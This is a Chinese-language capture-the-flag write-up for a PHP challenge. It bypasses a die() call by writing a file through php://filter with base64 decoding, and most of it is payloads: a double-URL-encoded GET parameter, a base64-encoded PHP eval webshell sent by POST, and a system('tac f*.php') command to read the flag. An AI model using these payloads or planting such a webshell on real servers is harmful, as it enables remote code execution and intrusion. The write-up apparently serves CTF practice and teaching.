目录
源代码:
做题思路:
- 知识点补充:
- urldecode函数:url解码函数,用于将经过URL编码的字符串转换回其原始格式
- die函数:终止程序
- base64编码:base64编码的范围为0~9,a~z,A~Z,+,/ 其他的字符全部过滤,故本题可以使用base64编码进行绕过die函数
- 注意:base64编码必须为4的倍数,由于base64编码范围的原因<?php die('大佬别秀了');?>会被过滤为phpdie为6个,需要加上任意2个在base64范围内的字符即可
- 代码审计:源码中有2个参数,分别是GET传参的file与POST方式传参
- POST传参:变量content与die函数用点相连接可以使用base64编码进行绕过,以防终止程序
- GER传参:file有urldecode函数(url解码函数),故需要将file进行2次url编码
做题方法:
使用php://filter/writer协议
做题步骤:
- 构造GET传参的payload:?file=php://filter/write=convert.base64-decode/resource=0421.php 并且使用bp进行两次url编码原payload:?file=php://filter/write=convert.base64-decode/resource=0421.php
双重加密后的payload:?
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%30%25%33%34%25%33%32%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30 - .构造POST的payload并base64加密,且在加密后前面加2个任意在base64范围内的字符
content=<?php @eval($_POST[y]);?>
ontent=PD9waHAgQGV2YWwoJF9QT1NUW3ldKTs/Pg==
content=aaPD9waHAgQGV2YWwoJF9QT1NUW3ldKTs/Pg==
-
访问0421.php,并且使用post进行传参,因为上面的post传的参数是y,所以post的payload是:y=system('tac f*.php'); 即可拿到flag